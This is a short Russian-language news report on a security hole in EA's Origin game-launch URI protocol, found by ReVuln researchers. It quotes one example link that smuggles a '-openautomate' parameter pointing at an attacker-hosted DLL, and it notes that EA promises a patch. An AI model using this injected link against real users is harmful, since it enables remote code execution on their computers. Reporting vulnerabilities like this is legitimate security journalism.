Обнаружена крупная брешь в безопасности Origin

Серьезная брешь в системе безопасности была обнаружена в протоколе Origin, который используется для запуска игр через кастомные линки с использованием структуры origin. Ars Technica сообщает, что группа инженеров ReVuln продемонстрировала то, как вредоносные программы могут запускаться при помощи модифицированных ссылок Origin скрытых под видом запуска игры.

В обычной ситуации, игра Origin вызывает комманду "origin://LaunchGame/[GameID]" при запуске чего-либо через браузер. По словам инженеров ReVuln, взломщики могут просто модифицировать путь к чему-то вроде "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll", для заражения команды, заставляя запускать внешний DLL.

В дополнении к этому было опубликовано видео демонстрирующее брешь. 

 EA сообщает, что уже приступила к решению проблемы и патч будет выпущен уже в ближайшее время.